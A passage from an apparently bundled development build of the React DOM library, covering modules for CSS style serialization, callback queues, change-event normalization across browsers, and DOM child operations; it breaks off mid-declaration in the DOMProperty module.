 *   > createMarkupForStyles({width: '200px', height: 0})\n   *   \"width:200px;height:0;\"\n   *\n   * Undefined values are ignored so that declarative programming is easier.\n   * The result should be HTML-escaped before insertion into the DOM.\n   *\n   * @param {object} styles\n   * @param {ReactDOMComponent} component\n   * @return {?string}\n   */\n  createMarkupForStyles: function (styles, component) {\n    var serialized = '';\n    for (var styleName in styles) {\n      if (!styles.hasOwnProperty(styleName)) {\n        continue;\n      }\n      var isCustomProperty = styleName.indexOf('--') === 0;\n      var styleValue = styles[styleName];\n      if (\"development\" !== 'production') {\n        if (!isCustomProperty) {\n          warnValidStyle(styleName, styleValue, component);\n        }\n      }\n      if (styleValue != null) {\n        serialized += processStyleName(styleName) + ':';\n        serialized += dangerousStyleValue(styleName, styleValue, component, isCustomProperty) + ';';\n      }\n    }\n    return serialized || null;\n  },\n\n  /**\n   * Sets the value for multiple styles on a node.  If a value is specified as\n   * '' (empty string), the corresponding style property will be unset.\n   *\n   * @param {DOMElement} node\n   * @param {object} styles\n   * @param {ReactDOMComponent} component\n   */\n  setValueForStyles: function (node, styles, component) {\n    if (\"development\" !== 'production') {\n      ReactInstrumentation.debugTool.onHostOperation({\n        instanceID: component._debugID,\n        type: 'update styles',\n        payload: styles\n      });\n    }\n\n    var style = node.style;\n    for (var styleName in styles) {\n      if (!styles.hasOwnProperty(styleName)) {\n        continue;\n      }\n      var isCustomProperty = styleName.indexOf('--') === 0;\n      if (\"development\" !== 'production') {\n        if (!isCustomProperty) {\n          warnValidStyle(styleName, styles[styleName], component);\n        }\n      }\n      var styleValue = dangerousStyleValue(styleName, styles[styleName], component, isCustomProperty);\n      if (styleName === 'float' || styleName === 'cssFloat') {\n        styleName = styleFloatAccessor;\n      }\n      if (isCustomProperty) {\n        style.setProperty(styleName, styleValue);\n      } else if (styleValue) {\n        style[styleName] = styleValue;\n      } else {\n        var expansion = hasShorthandPropertyBug && CSSProperty.shorthandPropertyExpansions[styleName];\n        if (expansion) {\n          // Shorthand property that IE8 won't like unsetting, so unset each\n          // component to placate it\n          for (var individualStyleName in expansion) {\n            style[individualStyleName] = '';\n          }\n        } else {\n          style[styleName] = '';\n        }\n      }\n    }\n  }\n};\n\nmodule.exports = CSSPropertyOperations;\n},{\"106\":106,\"138\":138,\"140\":140,\"151\":151,\"155\":155,\"159\":159,\"4\":4,\"64\":64}],6:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nfunction _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError(\"Cannot call a class as a function\"); } }\n\nvar PooledClass = _dereq_(25);\n\nvar invariant = _dereq_(152);\n\n/**\n * A specialized pseudo-event module to help keep track of components waiting to\n * be notified when their DOM representations are available for use.\n *\n * This implements `PooledClass`, so you should never need to instantiate this.\n * Instead, use `CallbackQueue.getPooled()`.\n *\n * @class ReactMountReady\n * @implements PooledClass\n * @internal\n */\n\nvar CallbackQueue = function () {\n  function CallbackQueue(arg) {\n    _classCallCheck(this, CallbackQueue);\n\n    this._callbacks = null;\n    this._contexts = null;\n    this._arg = arg;\n  }\n\n  /**\n   * Enqueues a callback to be invoked when `notifyAll` is invoked.\n   *\n   * @param {function} callback Invoked when `notifyAll` is invoked.\n   * @param {?object} context Context to call `callback` with.\n   * @internal\n   */\n\n\n  CallbackQueue.prototype.enqueue = function enqueue(callback, context) {\n    this._callbacks = this._callbacks || [];\n    this._callbacks.push(callback);\n    this._contexts = this._contexts || [];\n    this._contexts.push(context);\n  };\n\n  /**\n   * Invokes all enqueued callbacks and clears the queue. This is invoked after\n   * the DOM representation of a component has been created or updated.\n   *\n   * @internal\n   */\n\n\n  CallbackQueue.prototype.notifyAll = function notifyAll() {\n    var callbacks = this._callbacks;\n    var contexts = this._contexts;\n    var arg = this._arg;\n    if (callbacks && contexts) {\n      !(callbacks.length === contexts.length) ? \"development\" !== 'production' ? invariant(false, 'Mismatched list of contexts in callback queue') : _prodInvariant('24') : void 0;\n      this._callbacks = null;\n      this._contexts = null;\n      for (var i = 0; i < callbacks.length; i++) {\n        callbacks[i].call(contexts[i], arg);\n      }\n      callbacks.length = 0;\n      contexts.length = 0;\n    }\n  };\n\n  CallbackQueue.prototype.checkpoint = function checkpoint() {\n    return this._callbacks ? this._callbacks.length : 0;\n  };\n\n  CallbackQueue.prototype.rollback = function rollback(len) {\n    if (this._callbacks && this._contexts) {\n      this._callbacks.length = len;\n      this._contexts.length = len;\n    }\n  };\n\n  /**\n   * Resets the internal queue.\n   *\n   * @internal\n   */\n\n\n  CallbackQueue.prototype.reset = function reset() {\n    this._callbacks = null;\n    this._contexts = null;\n  };\n\n  /**\n   * `PooledClass` looks for this.\n   */\n\n\n  CallbackQueue.prototype.destructor = function destructor() {\n    this.reset();\n  };\n\n  return CallbackQueue;\n}();\n\nmodule.exports = PooledClass.addPoolingTo(CallbackQueue);\n},{\"126\":126,\"152\":152,\"25\":25}],7:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar EventPluginHub = _dereq_(17);\nvar EventPropagators = _dereq_(20);\nvar ExecutionEnvironment = _dereq_(138);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactUpdates = _dereq_(82);\nvar SyntheticEvent = _dereq_(91);\n\nvar inputValueTracking = _dereq_(120);\nvar getEventTarget = _dereq_(114);\nvar isEventSupported = _dereq_(122);\nvar isTextInputElement = _dereq_(123);\n\nvar eventTypes = {\n  change: {\n    phasedRegistrationNames: {\n      bubbled: 'onChange',\n      captured: 'onChangeCapture'\n    },\n    dependencies: ['topBlur', 'topChange', 'topClick', 'topFocus', 'topInput', 'topKeyDown', 'topKeyUp', 'topSelectionChange']\n  }\n};\n\nfunction createAndAccumulateChangeEvent(inst, nativeEvent, target) {\n  var event = SyntheticEvent.getPooled(eventTypes.change, inst, nativeEvent, target);\n  event.type = 'change';\n  EventPropagators.accumulateTwoPhaseDispatches(event);\n  return event;\n}\n/**\n * For IE shims\n */\nvar activeElement = null;\nvar activeElementInst = null;\n\n/**\n * SECTION: handle `change` event\n */\nfunction shouldUseChangeEvent(elem) {\n  var nodeName = elem.nodeName && elem.nodeName.toLowerCase();\n  return nodeName === 'select' || nodeName === 'input' && elem.type === 'file';\n}\n\nvar doesChangeEventBubble = false;\nif (ExecutionEnvironment.canUseDOM) {\n  // See `handleChange` comment below\n  doesChangeEventBubble = isEventSupported('change') && (!document.documentMode || document.documentMode > 8);\n}\n\nfunction manualDispatchChangeEvent(nativeEvent) {\n  var event = createAndAccumulateChangeEvent(activeElementInst, nativeEvent, getEventTarget(nativeEvent));\n\n  // If change and propertychange bubbled, we'd just bind to it like all the\n  // other events and have it go through ReactBrowserEventEmitter. Since it\n  // doesn't, we manually listen for the events and so we have to enqueue and\n  // process the abstract event manually.\n  //\n  // Batching is necessary here in order to ensure that all event handlers run\n  // before the next rerender (including event handlers attached to ancestor\n  // elements instead of directly on the input). Without this, controlled\n  // components don't work properly in conjunction with event bubbling because\n  // the component is rerendered and the value reverted before all the event\n  // handlers can run. See https://github.com/facebook/react/issues/708.\n  ReactUpdates.batchedUpdates(runEventInBatch, event);\n}\n\nfunction runEventInBatch(event) {\n  EventPluginHub.enqueueEvents(event);\n  EventPluginHub.processEventQueue(false);\n}\n\nfunction startWatchingForChangeEventIE8(target, targetInst) {\n  activeElement = target;\n  activeElementInst = targetInst;\n  activeElement.attachEvent('onchange', manualDispatchChangeEvent);\n}\n\nfunction stopWatchingForChangeEventIE8() {\n  if (!activeElement) {\n    return;\n  }\n  activeElement.detachEvent('onchange', manualDispatchChangeEvent);\n  activeElement = null;\n  activeElementInst = null;\n}\n\nfunction getInstIfValueChanged(targetInst, nativeEvent) {\n  var updated = inputValueTracking.updateValueIfChanged(targetInst);\n  var simulated = nativeEvent.simulated === true && ChangeEventPlugin._allowSimulatedPassThrough;\n\n  if (updated || simulated) {\n    return targetInst;\n  }\n}\n\nfunction getTargetInstForChangeEvent(topLevelType, targetInst) {\n  if (topLevelType === 'topChange') {\n    return targetInst;\n  }\n}\n\nfunction handleEventsForChangeEventIE8(topLevelType, target, targetInst) {\n  if (topLevelType === 'topFocus') {\n    // stopWatching() should be a noop here but we call it just in case we\n    // missed a blur event somehow.\n    stopWatchingForChangeEventIE8();\n    startWatchingForChangeEventIE8(target, targetInst);\n  } else if (topLevelType === 'topBlur') {\n    stopWatchingForChangeEventIE8();\n  }\n}\n\n/**\n * SECTION: handle `input` event\n */\nvar isInputEventSupported = false;\nif (ExecutionEnvironment.canUseDOM) {\n  // IE9 claims to support the input event but fails to trigger it when\n  // deleting text, so we ignore its input events.\n\n  isInputEventSupported = isEventSupported('input') && (!('documentMode' in document) || document.documentMode > 9);\n}\n\n/**\n * (For IE <=9) Starts tracking propertychange events on the passed-in element\n * and override the value property so that we can distinguish user events from\n * value changes in JS.\n */\nfunction startWatchingForValueChange(target, targetInst) {\n  activeElement = target;\n  activeElementInst = targetInst;\n  activeElement.attachEvent('onpropertychange', handlePropertyChange);\n}\n\n/**\n * (For IE <=9) Removes the event listeners from the currently-tracked element,\n * if any exists.\n */\nfunction stopWatchingForValueChange() {\n  if (!activeElement) {\n    return;\n  }\n  activeElement.detachEvent('onpropertychange', handlePropertyChange);\n\n  activeElement = null;\n  activeElementInst = null;\n}\n\n/**\n * (For IE <=9) Handles a propertychange event, sending a `change` event if\n * the value of the active element has changed.\n */\nfunction handlePropertyChange(nativeEvent) {\n  if (nativeEvent.propertyName !== 'value') {\n    return;\n  }\n  if (getInstIfValueChanged(activeElementInst, nativeEvent)) {\n    manualDispatchChangeEvent(nativeEvent);\n  }\n}\n\nfunction handleEventsForInputEventPolyfill(topLevelType, target, targetInst) {\n  if (topLevelType === 'topFocus') {\n    // In IE8, we can capture almost all .value changes by adding a\n    // propertychange handler and looking for events with propertyName\n    // equal to 'value'\n    // In IE9, propertychange fires for most input events but is buggy and\n    // doesn't fire when text is deleted, but conveniently, selectionchange\n    // appears to fire in all of the remaining cases so we catch those and\n    // forward the event if the value has changed\n    // In either case, we don't want to call the event handler if the value\n    // is changed from JS so we redefine a setter for `.value` that updates\n    // our activeElementValue variable, allowing us to ignore those changes\n    //\n    // stopWatching() should be a noop here but we call it just in case we\n    // missed a blur event somehow.\n    stopWatchingForValueChange();\n    startWatchingForValueChange(target, targetInst);\n  } else if (topLevelType === 'topBlur') {\n    stopWatchingForValueChange();\n  }\n}\n\n// For IE8 and IE9.\nfunction getTargetInstForInputEventPolyfill(topLevelType, targetInst, nativeEvent) {\n  if (topLevelType === 'topSelectionChange' || topLevelType === 'topKeyUp' || topLevelType === 'topKeyDown') {\n    // On the selectionchange event, the target is just document which isn't\n    // helpful for us so just check activeElement instead.\n    //\n    // 99% of the time, keydown and keyup aren't necessary. IE8 fails to fire\n    // propertychange on the first input event after setting `value` from a\n    // script and fires only keydown, keypress, keyup. Catching keyup usually\n    // gets it and catching keydown lets us fire an event for the first\n    // keystroke if user does a key repeat (it'll be a little delayed: right\n    // before the second keystroke). Other input methods (e.g., paste) seem to\n    // fire selectionchange normally.\n    return getInstIfValueChanged(activeElementInst, nativeEvent);\n  }\n}\n\n/**\n * SECTION: handle `click` event\n */\nfunction shouldUseClickEvent(elem) {\n  // Use the `click` event to detect changes to checkbox and radio inputs.\n  // This approach works across all browsers, whereas `change` does not fire\n  // until `blur` in IE8.\n  var nodeName = elem.nodeName;\n  return nodeName && nodeName.toLowerCase() === 'input' && (elem.type === 'checkbox' || elem.type === 'radio');\n}\n\nfunction getTargetInstForClickEvent(topLevelType, targetInst, nativeEvent) {\n  if (topLevelType === 'topClick') {\n    return getInstIfValueChanged(targetInst, nativeEvent);\n  }\n}\n\nfunction getTargetInstForInputOrChangeEvent(topLevelType, targetInst, nativeEvent) {\n  if (topLevelType === 'topInput' || topLevelType === 'topChange') {\n    return getInstIfValueChanged(targetInst, nativeEvent);\n  }\n}\n\nfunction handleControlledInputBlur(inst, node) {\n  // TODO: In IE, inst is occasionally null. Why?\n  if (inst == null) {\n    return;\n  }\n\n  // Fiber and ReactDOM keep wrapper state in separate places\n  var state = inst._wrapperState || node._wrapperState;\n\n  if (!state || !state.controlled || node.type !== 'number') {\n    return;\n  }\n\n  // If controlled, assign the value attribute to the current value on blur\n  var value = '' + node.value;\n  if (node.getAttribute('value') !== value) {\n    node.setAttribute('value', value);\n  }\n}\n\n/**\n * This plugin creates an `onChange` event that normalizes change events\n * across form elements. This event fires at a time when it's possible to\n * change the element's value without seeing a flicker.\n *\n * Supported elements are:\n * - input (see `isTextInputElement`)\n * - textarea\n * - select\n */\nvar ChangeEventPlugin = {\n  eventTypes: eventTypes,\n\n  _allowSimulatedPassThrough: true,\n  _isInputEventSupported: isInputEventSupported,\n\n  extractEvents: function (topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n    var targetNode = targetInst ? ReactDOMComponentTree.getNodeFromInstance(targetInst) : window;\n\n    var getTargetInstFunc, handleEventFunc;\n    if (shouldUseChangeEvent(targetNode)) {\n      if (doesChangeEventBubble) {\n        getTargetInstFunc = getTargetInstForChangeEvent;\n      } else {\n        handleEventFunc = handleEventsForChangeEventIE8;\n      }\n    } else if (isTextInputElement(targetNode)) {\n      if (isInputEventSupported) {\n        getTargetInstFunc = getTargetInstForInputOrChangeEvent;\n      } else {\n        getTargetInstFunc = getTargetInstForInputEventPolyfill;\n        handleEventFunc = handleEventsForInputEventPolyfill;\n      }\n    } else if (shouldUseClickEvent(targetNode)) {\n      getTargetInstFunc = getTargetInstForClickEvent;\n    }\n\n    if (getTargetInstFunc) {\n      var inst = getTargetInstFunc(topLevelType, targetInst, nativeEvent);\n      if (inst) {\n        var event = createAndAccumulateChangeEvent(inst, nativeEvent, nativeEventTarget);\n        return event;\n      }\n    }\n\n    if (handleEventFunc) {\n      handleEventFunc(topLevelType, targetNode, targetInst);\n    }\n\n    // When blurring, set the value attribute for number inputs\n    if (topLevelType === 'topBlur') {\n      handleControlledInputBlur(targetInst, targetNode);\n    }\n  }\n};\n\nmodule.exports = ChangeEventPlugin;\n},{\"114\":114,\"120\":120,\"122\":122,\"123\":123,\"138\":138,\"17\":17,\"20\":20,\"34\":34,\"82\":82,\"91\":91}],8:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMLazyTree = _dereq_(9);\nvar Danger = _dereq_(13);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactInstrumentation = _dereq_(64);\n\nvar createMicrosoftUnsafeLocalFunction = _dereq_(105);\nvar setInnerHTML = _dereq_(128);\nvar setTextContent = _dereq_(129);\n\nfunction getNodeAfter(parentNode, node) {\n  // Special case for text components, which return [open, close] comments\n  // from getHostNode.\n  if (Array.isArray(node)) {\n    node = node[1];\n  }\n  return node ? node.nextSibling : parentNode.firstChild;\n}\n\n/**\n * Inserts `childNode` as a child of `parentNode` at the `index`.\n *\n * @param {DOMElement} parentNode Parent node in which to insert.\n * @param {DOMElement} childNode Child node to insert.\n * @param {number} index Index at which to insert the child.\n * @internal\n */\nvar insertChildAt = createMicrosoftUnsafeLocalFunction(function (parentNode, childNode, referenceNode) {\n  // We rely exclusively on `insertBefore(node, null)` instead of also using\n  // `appendChild(node)`. (Using `undefined` is not allowed by all browsers so\n  // we are careful to use `null`.)\n  parentNode.insertBefore(childNode, referenceNode);\n});\n\nfunction insertLazyTreeChildAt(parentNode, childTree, referenceNode) {\n  DOMLazyTree.insertTreeBefore(parentNode, childTree, referenceNode);\n}\n\nfunction moveChild(parentNode, childNode, referenceNode) {\n  if (Array.isArray(childNode)) {\n    moveDelimitedText(parentNode, childNode[0], childNode[1], referenceNode);\n  } else {\n    insertChildAt(parentNode, childNode, referenceNode);\n  }\n}\n\nfunction removeChild(parentNode, childNode) {\n  if (Array.isArray(childNode)) {\n    var closingComment = childNode[1];\n    childNode = childNode[0];\n    removeDelimitedText(parentNode, childNode, closingComment);\n    parentNode.removeChild(closingComment);\n  }\n  parentNode.removeChild(childNode);\n}\n\nfunction moveDelimitedText(parentNode, openingComment, closingComment, referenceNode) {\n  var node = openingComment;\n  while (true) {\n    var nextNode = node.nextSibling;\n    insertChildAt(parentNode, node, referenceNode);\n    if (node === closingComment) {\n      break;\n    }\n    node = nextNode;\n  }\n}\n\nfunction removeDelimitedText(parentNode, startNode, closingComment) {\n  while (true) {\n    var node = startNode.nextSibling;\n    if (node === closingComment) {\n      // The closing comment is removed by ReactMultiChild.\n      break;\n    } else {\n      parentNode.removeChild(node);\n    }\n  }\n}\n\nfunction replaceDelimitedText(openingComment, closingComment, stringText) {\n  var parentNode = openingComment.parentNode;\n  var nodeAfterComment = openingComment.nextSibling;\n  if (nodeAfterComment === closingComment) {\n    // There are no text nodes between the opening and closing comments; insert\n    // a new one if stringText isn't empty.\n    if (stringText) {\n      insertChildAt(parentNode, document.createTextNode(stringText), nodeAfterComment);\n    }\n  } else {\n    if (stringText) {\n      // Set the text content of the first node after the opening comment, and\n      // remove all following nodes up until the closing comment.\n      setTextContent(nodeAfterComment, stringText);\n      removeDelimitedText(parentNode, nodeAfterComment, closingComment);\n    } else {\n      removeDelimitedText(parentNode, openingComment, closingComment);\n    }\n  }\n\n  if (\"development\" !== 'production') {\n    ReactInstrumentation.debugTool.onHostOperation({\n      instanceID: ReactDOMComponentTree.getInstanceFromNode(openingComment)._debugID,\n      type: 'replace text',\n      payload: stringText\n    });\n  }\n}\n\nvar dangerouslyReplaceNodeWithMarkup = Danger.dangerouslyReplaceNodeWithMarkup;\nif (\"development\" !== 'production') {\n  dangerouslyReplaceNodeWithMarkup = function (oldChild, markup, prevInstance) {\n    Danger.dangerouslyReplaceNodeWithMarkup(oldChild, markup);\n    if (prevInstance._debugID !== 0) {\n      ReactInstrumentation.debugTool.onHostOperation({\n        instanceID: prevInstance._debugID,\n        type: 'replace with',\n        payload: markup.toString()\n      });\n    } else {\n      var nextInstance = ReactDOMComponentTree.getInstanceFromNode(markup.node);\n      if (nextInstance._debugID !== 0) {\n        ReactInstrumentation.debugTool.onHostOperation({\n          instanceID: nextInstance._debugID,\n          type: 'mount',\n          payload: markup.toString()\n        });\n      }\n    }\n  };\n}\n\n/**\n * Operations for updating with DOM children.\n */\nvar DOMChildrenOperations = {\n  dangerouslyReplaceNodeWithMarkup: dangerouslyReplaceNodeWithMarkup,\n\n  replaceDelimitedText: replaceDelimitedText,\n\n  /**\n   * Updates a component's children by processing a series of updates. The\n   * update configurations are each expected to have a `parentNode` property.\n   *\n   * @param {array<object>} updates List of update configurations.\n   * @internal\n   */\n  processUpdates: function (parentNode, updates) {\n    if (\"development\" !== 'production') {\n      var parentNodeDebugID = ReactDOMComponentTree.getInstanceFromNode(parentNode)._debugID;\n    }\n\n    for (var k = 0; k < updates.length; k++) {\n      var update = updates[k];\n      switch (update.type) {\n        case 'INSERT_MARKUP':\n          insertLazyTreeChildAt(parentNode, update.content, getNodeAfter(parentNode, update.afterNode));\n          if (\"development\" !== 'production') {\n            ReactInstrumentation.debugTool.onHostOperation({\n              instanceID: parentNodeDebugID,\n              type: 'insert child',\n              payload: {\n                toIndex: update.toIndex,\n                content: update.content.toString()\n              }\n            });\n          }\n          break;\n        case 'MOVE_EXISTING':\n          moveChild(parentNode, update.fromNode, getNodeAfter(parentNode, update.afterNode));\n          if (\"development\" !== 'production') {\n            ReactInstrumentation.debugTool.onHostOperation({\n              instanceID: parentNodeDebugID,\n              type: 'move child',\n              payload: { fromIndex: update.fromIndex, toIndex: update.toIndex }\n            });\n          }\n          break;\n        case 'SET_MARKUP':\n          setInnerHTML(parentNode, update.content);\n          if (\"development\" !== 'production') {\n            ReactInstrumentation.debugTool.onHostOperation({\n              instanceID: parentNodeDebugID,\n              type: 'replace children',\n              payload: update.content.toString()\n            });\n          }\n          break;\n        case 'TEXT_CONTENT':\n          setTextContent(parentNode, update.content);\n          if (\"development\" !== 'production') {\n            ReactInstrumentation.debugTool.onHostOperation({\n              instanceID: parentNodeDebugID,\n              type: 'replace text',\n              payload: update.content.toString()\n            });\n          }\n          break;\n        case 'REMOVE_NODE':\n          removeChild(parentNode, update.fromNode);\n          if (\"development\" !== 'production') {\n            ReactInstrumentation.debugTool.onHostOperation({\n              instanceID: parentNodeDebugID,\n              type: 'remove child',\n              payload: { fromIndex: update.fromIndex }\n            });\n          }\n          break;\n      }\n    }\n  }\n};\n\nmodule.exports = DOMChildrenOperations;\n},{\"105\":105,\"128\":128,\"129\":129,\"13\":13,\"34\":34,\"64\":64,\"9\":9}],9:[function(_dereq_,module,exports){\n/**\n * Copyright 2015-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMNamespaces = _dereq_(10);\nvar setInnerHTML = _dereq_(128);\n\nvar createMicrosoftUnsafeLocalFunction = _dereq_(105);\nvar setTextContent = _dereq_(129);\n\nvar ELEMENT_NODE_TYPE = 1;\nvar DOCUMENT_FRAGMENT_NODE_TYPE = 11;\n\n/**\n * In IE (8-11) and Edge, appending nodes with no children is dramatically\n * faster than appending a full subtree, so we essentially queue up the\n * .appendChild calls here and apply them so each node is added to its parent\n * before any children are added.\n *\n * In other browsers, doing so is slower or neutral compared to the other order\n * (in Firefox, twice as slow) so we only do this inversion in IE.\n *\n * See https://github.com/spicyj/innerhtml-vs-createelement-vs-clonenode.\n */\nvar enableLazy = typeof document !== 'undefined' && typeof document.documentMode === 'number' || typeof navigator !== 'undefined' && typeof navigator.userAgent === 'string' && /\\bEdge\\/\\d/.test(navigator.userAgent);\n\nfunction insertTreeChildren(tree) {\n  if (!enableLazy) {\n    return;\n  }\n  var node = tree.node;\n  var children = tree.children;\n  if (children.length) {\n    for (var i = 0; i < children.length; i++) {\n      insertTreeBefore(node, children[i], null);\n    }\n  } else if (tree.html != null) {\n    setInnerHTML(node, tree.html);\n  } else if (tree.text != null) {\n    setTextContent(node, tree.text);\n  }\n}\n\nvar insertTreeBefore = createMicrosoftUnsafeLocalFunction(function (parentNode, tree, referenceNode) {\n  // DocumentFragments aren't actually part of the DOM after insertion so\n  // appending children won't update the DOM. We need to ensure the fragment\n  // is properly populated first, breaking out of our lazy approach for just\n  // this level. Also, some <object> plugins (like Flash Player) will read\n  // <param> nodes immediately upon insertion into the DOM, so <object>\n  // must also be populated prior to insertion into the DOM.\n  if (tree.node.nodeType === DOCUMENT_FRAGMENT_NODE_TYPE || tree.node.nodeType === ELEMENT_NODE_TYPE && tree.node.nodeName.toLowerCase() === 'object' && (tree.node.namespaceURI == null || tree.node.namespaceURI === DOMNamespaces.html)) {\n    insertTreeChildren(tree);\n    parentNode.insertBefore(tree.node, referenceNode);\n  } else {\n    parentNode.insertBefore(tree.node, referenceNode);\n    insertTreeChildren(tree);\n  }\n});\n\nfunction replaceChildWithTree(oldNode, newTree) {\n  oldNode.parentNode.replaceChild(newTree.node, oldNode);\n  insertTreeChildren(newTree);\n}\n\nfunction queueChild(parentTree, childTree) {\n  if (enableLazy) {\n    parentTree.children.push(childTree);\n  } else {\n    parentTree.node.appendChild(childTree.node);\n  }\n}\n\nfunction queueHTML(tree, html) {\n  if (enableLazy) {\n    tree.html = html;\n  } else {\n    setInnerHTML(tree.node, html);\n  }\n}\n\nfunction queueText(tree, text) {\n  if (enableLazy) {\n    tree.text = text;\n  } else {\n    setTextContent(tree.node, text);\n  }\n}\n\nfunction toString() {\n  return this.node.nodeName;\n}\n\nfunction DOMLazyTree(node) {\n  return {\n    node: node,\n    children: [],\n    html: null,\n    text: null,\n    toString: toString\n  };\n}\n\nDOMLazyTree.insertTreeBefore = insertTreeBefore;\nDOMLazyTree.replaceChildWithTree = replaceChildWithTree;\nDOMLazyTree.queueChild = queueChild;\nDOMLazyTree.queueHTML = queueHTML;\nDOMLazyTree.queueText = queueText;\n\nmodule.exports = DOMLazyTree;\n},{\"10\":10,\"105\":105,\"128\":128,\"129\":129}],10:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMNamespaces = {\n  html: 'http://www.w3.org/1999/xhtml',\n  mathml: 'http://www.w3.org/1998/Math/MathML',\n  svg: 'http://www.w3.org/2000/svg'\n};\n\nmodule.exports = DOMNamespaces;\n},{}],11:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\nfunction checkMask(value, bitmask) {\n  return (value & bitmask) === bitmask;\n}\n\nvar DOMPropertyInjection = {\n  /**\n   * Mapping from normalized, camelcased property names to a configuration that\n   * specifies how the associated DOM property should be accessed or rendered.\n   */\n  MUST_USE_PROPERTY: 0x1,\n  HAS_BOOLEAN_VALUE: 0x4,\n  HAS_NUMERIC_VALUE: 0x8,\n  HAS_POSITIVE_NUMERIC_VALUE: 0x10 | 0x8,\n  HAS_OVERLOADED_BOOLEAN_VALUE: 0x20,\n\n  /**\n   * Inject some specialized knowledge about the DOM. This takes a config object\n   * with the following properties:\n   *\n   * isCustomAttribute: function that given an attribute name will return true\n   * if it can be inserted into the DOM verbatim. Useful for data-* or aria-*\n   * attributes where it's impossible to enumerate all of the possible\n   * attribute names,\n   *\n   * Properties: object mapping DOM property name to one of the\n   * DOMPropertyInjection constants or null. If your attribute isn't in here,\n   * it won't get written to the DOM.\n   *\n   * DOMAttributeNames: object mapping React attribute name to the DOM\n   * attribute name. Attribute names not specified use the **lowercase**\n   * normalized name.\n   *\n   * DOMAttributeNamespaces: object mapping React attribute name to the DOM\n   * attribute namespace URL. (Attribute names not specified use no namespace.)\n   *\n   * DOMPropertyNames: similar to DOMAttributeNames but for DOM properties.\n   * Property names not specified use the normalized name.\n   *\n   * DOMMutationMethods: Properties that require special mutation methods. If\n   * `value` is undefined, the mutation method should unset the property.\n   *\n   * @param {object} domPropertyConfig the config as described above.\n   */\n  injectDOMPropertyConfig: function (domPropertyConfig) {\n    var Injection = DOMPropertyInjection;\n    var Properties = domPropertyConfig.Properties || {};\n    var DOMAttributeNamespaces = domPropertyConfig.DOMAttributeNamespaces || {};\n    var DOMAttributeNames = domPropertyConfig.DOMAttributeNames || {};\n    var DOMPropertyNames = domPropertyConfig.DOMPropertyNames || {};\n    var DOMMutationMethods = domPropertyConfig.DOMMutationMethods || {};\n\n    if (domPropertyConfig.isCustomAttribute) {\n      DOMProperty._isCustomAttributeFunctions.push(domPropertyConfig.isCustomAttribute);\n    }\n\n    for (var propName in Properties) {\n      !!DOMProperty.properties.hasOwnProperty(propName) ? \"development\" !== 'production' ? invariant(false, 'injectDOMPropertyConfig(...): You\\'re trying to inject DOM property \\'%s\\' which has already been injected. You may be accidentally injecting the same DOM property config twice, or you may be injecting two configs that have conflicting property names.', propName) : _prodInvariant('48', propName) : void 0;\n\n      var lowerCased = propName.toLowerCase();\n      var propConfig = Properties[propName];\n\n      var propertyInfo = {\n        attributeName: lowerCased,\n        attributeNamespace: null,\n        propertyName: propName,\n        mutationMethod: null,\n\n        mustUseProperty: checkMask(propConfig, Injection.MUST_USE_PROPERTY),\n        hasBooleanValue: checkMask(propConfig, Injection.HAS_BOOLEAN_VALUE),\n        hasNumericValue: checkMask(propConfig, Injection.HAS_NUMERIC_VALUE),\n        hasPositiveNumericValue: checkMask(propConfig, Injection.HAS_POSITIVE_NUMERIC_VALUE),\n        hasOverloadedBooleanValue: checkMask(propConfig, Injection.HAS_OVERLOADED_BOOLEAN_VALUE)\n      };\n      !(propertyInfo.hasBooleanValue + propertyInfo.hasNumericValue + propertyInfo.hasOverloadedBooleanValue <= 1) ? \"development\" !== 'production' ? invariant(false, 'DOMProperty: Value can be one of boolean, overloaded boolean, or numeric value, but not a combination: %s', propName) : _prodInvariant('50', propName) : void 0;\n\n      if (\"development\" !== 'production') {\n        DOMProperty.getPossibleStandardName[lowerCased] = propName;\n      }\n\n      if (DOMAttributeNames.hasOwnProperty(propName)) {\n        var attributeName = DOMAttributeNames[propName];\n        propertyInfo.attributeName = attributeName;\n        if (\"development\" !== 'production') {\n          DOMProperty.getPossibleStandardName[attributeName] = propName;\n        }\n      }\n\n      if (DOMAttributeNamespaces.hasOwnProperty(propName)) {\n        propertyInfo.attributeNamespace = DOMAttributeNamespaces[propName];\n      }\n\n      if (DOMPropertyNames.hasOwnProperty(propName)) {\n        propertyInfo.propertyName = DOMPropertyNames[propName];\n      }\n\n      if (DOMMutationMethods.hasOwnProperty(propName)) {\n        propertyInfo.mutationMethod = DOMMutationMethods[propName];\n      }\n\n      DOMProperty.properties[propName] = propertyInfo;\n    }\n  }\n};\n\n/* eslint-disable max-len */\nvar 